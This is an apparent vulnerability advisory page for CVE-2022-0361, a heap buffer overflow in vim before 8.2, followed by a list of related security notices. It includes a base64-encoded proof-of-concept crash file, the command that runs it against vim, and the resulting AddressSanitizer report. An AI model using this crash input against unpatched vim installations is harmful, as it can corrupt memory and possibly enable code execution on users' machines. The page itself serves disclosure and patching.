Headline
CVE-2022-0361: Heap-based Buffer Overflow in vim
Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.
Description
Heap Overflow and arbitrary 41 bytes write.
Unsorted bin doubly linked list corruption.
commit hash : 058ee7c5699ef551be5aa04c66b3cffc436e9b08
Proof of Concept
$ echo -ne "bm9ybTBv7wX//wUwIDUwMDAwMDAwezAtMDAwMP/yAAD6MDAwMDAwMDAwMDQwKSkpMDAQMDAwMDAw
AAogIFVpbCFub3JtCPkICAgIEAAAAA4KICBzFCwUFBQUFBQUFBQUFBQUFGxrsWUKICBzaWwhbm9y
bQgICBj31/cwFhcYsk8qAAQwMjIyMjIiMjKAMDAwMDAwMDAwMDCAADAAAAEA/38AADAwMCVkZ4Vv
ZXh0YBQUFBQPa25lMDAwfAACdCAUFBQUD2tuZQnTNnIyMjIyMjIyMDAwMDBAMDA2NjY2NsbGAAHC
xjAwAQAwMDAwMDAwMDQwgBkBADAwMDAyMDAwMDBTMDAwMDAwgDARMDAwMDBAMDAwMDAwMDA3MEUw
MDAwMDAwMDBSMHAwLTAwMDAwMDAwMDAwMDAwMDAwMDAwMDBAMDAwMDAwMDAwNDAwAH8wMDAwMDAw
MIAwnjCyTyp8fHx8fHx0IDBNMDAwMAAAMDAwMAAKICBzaWwhbm9ybQgICAgIEDAwMDAwMDA2MDAw
MCIwMEAwMDAwfWdnZ2lnZ2dOJ2dVZ2dnZ2dnZ2dnZ2cmMDAwMDAyMDB4dCAUFBQUD2tuZQogMDAw
MDAwMDAwMCEwADAwAAAAgDAwMDAwMDD/fyAwMA9LEzAwMDAwMHswLTAwMDD/8gAA+jAwMDAwMDAw
MDA0MCkpKTAwRjowMMDAwGV4dGAUFBQUD2tuZTAwMDD1LzD/fxUwMDAwMDAwMBNTU1NTU1NTU1NT
U1NTU1NTMDAwMDAeMDAcMDBwAAEwgAAwODAwMDAwMDA8MDAwMDAwMDBNMDAZMDAwMDAwXzcwMDAw
MDAwMDAwMDAwMDgwMDAwMDErMDAwLxEwMP8wMDAwMDAwMDMwAAAAQDAwMDAwMDAwMCEwADAwAAAA
gDAwMBowMDAwTTAwMDAwMDAwMDA3MDAwMDAA/zAICAgWFw6yTyoDZ3kwMPoACiAgMDAwMDAwMAA=" | base64 -d > poc
$ /home/alkyne/fuzzing/vim_asan/src/vim -u NONE -i NONE -n -X -Z -e -m -s -S poc -c ":qa!"
ïÿ0 50000000{0-01777777777777777777777ÿò
ïÿ0 50000000{0-01777777777777777777777ÿò
=================================================================
==3619358==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000007473 at pc 0x000000495b45 bp 0x7ffd1dd9e330 sp 0x7ffd1dd9daf8
WRITE of size 41 at 0x602000007473 thread T0
#0 0x495b44 in __asan_memmove (/home/alkyne/fuzzing/vim_asan/src/vim+0x495b44)
#1 0x51ee94 in memmove /usr/include/x86_64-linux-gnu/bits/string_fortified.h:40:10
#2 0x51ee94 in ins_char_bytes /home/alkyne/fuzzing/vim_asan/src/change.c:1094:2
#3 0x51f6fe in ins_char /home/alkyne/fuzzing/vim_asan/src/change.c:1003:5
#4 0x988589 in swapchar /home/alkyne/fuzzing/vim_asan/src/ops.c:1445:6
#5 0x99b554 in swapchars /home/alkyne/fuzzing/vim_asan/src/ops.c:1379:16
#6 0x99b554 in op_tilde /home/alkyne/fuzzing/vim_asan/src/ops.c:1303:17
#7 0x99b554 in do_pending_operator /home/alkyne/fuzzing/vim_asan/src/ops.c:4109:3
#8 0x93bb29 in normal_cmd /home/alkyne/fuzzing/vim_asan/src/normal.c:1146:2
#9 0x70ce2b in exec_normal /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c
#10 0x70bb3c in exec_normal_cmd /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c:8601:5
#11 0x70bb3c in ex_normal /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c:8519:6
#12 0x6e337c in do_one_cmd /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c:2573:2
#13 0x6e337c in do_cmdline /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c:993:17
#14 0xbbae2d in do_source /home/alkyne/fuzzing/vim_asan/src/scriptfile.c:1512:5
#15 0xbb8e8c in cmd_source /home/alkyne/fuzzing/vim_asan/src/scriptfile.c:1098:14
#16 0xbb8e8c in ex_source /home/alkyne/fuzzing/vim_asan/src/scriptfile.c:1124:2
#17 0x6e337c in do_one_cmd /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c:2573:2
#18 0x6e337c in do_cmdline /home/alkyne/fuzzing/vim_asan/src/ex_docmd.c:993:17
#19 0xf99d44 in exe_commands /home/alkyne/fuzzing/vim_asan/src/main.c:3091:2
#20 0xf99d44 in vim_main2 /home/alkyne/fuzzing/vim_asan/src/main.c:774:2
#21 0xf9677f in main /home/alkyne/fuzzing/vim_asan/src/main.c:426:12
#22 0x7fdf81c100b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#23 0x41da9d in _start (/home/alkyne/fuzzing/vim_asan/src/vim+0x41da9d)
0x602000007473 is located 0 bytes to the right of 3-byte region [0x602000007470,0x602000007473)
allocated by thread T0 here:
#0 0x4961dd in malloc (/home/alkyne/fuzzing/vim_asan/src/vim+0x4961dd)
#1 0x4c5e15 in lalloc /home/alkyne/fuzzing/vim_asan/src/alloc.c:248:11
SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/alkyne/fuzzing/vim_asan/src/vim+0x495b44) in __asan_memmove
Shadow bytes around the buggy address:
0x0c047fff8e30: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff8e40: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff8e50: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff8e60: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff8e70: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
=>0x0c047fff8e80: fa fa 02 fa fa fa 03 fa fa fa 01 fa fa fa[03]fa
0x0c047fff8e90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8ea0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8eb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8ec0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff8ed0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==3619358==ABORTING
Impact
Heap Overflow may lead to execute arbitrary code.
Related news
Ubuntu Security Notice 6026-1 - It was discovered that Vim was incorrectly processing Vim buffers. An attacker could possibly use this issue to perform illegal memory access and expose sensitive information. This issue only affected Ubuntu 20.04 LTS. It was discovered that Vim was using freed memory when dealing with regular expressions inside a visual selection. If a user were tricked into opening a specially crafted file, an attacker could crash the application, leading to a denial of service, or possibly achieve code execution with user privileges. This issue only affected Ubuntu 14.04 ESM, Ubuntu 18.04 LTS and Ubuntu 20.04 LTS.
Dell Streaming Data Platform prior to 1.4 contains Open Redirect vulnerability. An attacker with privileges same as a legitimate user can phish the legitimate the user to redirect to malicious website leading to information disclosure and launch of phishing attacks.
Dell VxRail, versions prior to 7.0.410, contain a Container Escape Vulnerability. A local high-privileged attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the container's underlying OS. Exploitation may lead to a system take over by an attacker.
Hello everyone! Great news for my open source Scanvus project! You can now perform vulnerability checks on Linux hosts and docker images not only using the Vulners.com API, but also with the Vulns.io VM API. It’s especially nice that all the code to support the new API was written and contributed by colleagues from Vulns.io. […]
A memory corruption issue existed in the processing of ICC profiles. This issue was addressed with improved input validation. This issue is fixed in macOS Ventura 13. Processing a maliciously crafted image may lead to arbitrary code execution.
Gentoo Linux Security Advisory 202208-32 - Multiple vulnerabilities have been discovered in Vim, the worst of which could result in denial of service. Versions less than 9.0.0060 are affected.
Dell Unity, Dell UnityVSA, and Dell Unity XT versions prior to 5.2.0.0.5.173 contain a plain-text password storage vulnerability when certain off-array tools are run on the system. The credentials of a user with high privileges are stored in plain text. A local malicious user with high privileges may use the exposed password to gain access with the privileges of the compromised user.
Ubuntu Security Notice 5458-1 - It was discovered that Vim was incorrectly handling virtual column position operations, which could result in an out-of-bounds read. An attacker could possibly use this issue to expose sensitive information. It was discovered that Vim was not properly performing bounds checks when updating windows present on a screen, which could result in a heap buffer overflow. An attacker could possibly use this issue to cause a denial of service or execute arbitrary code.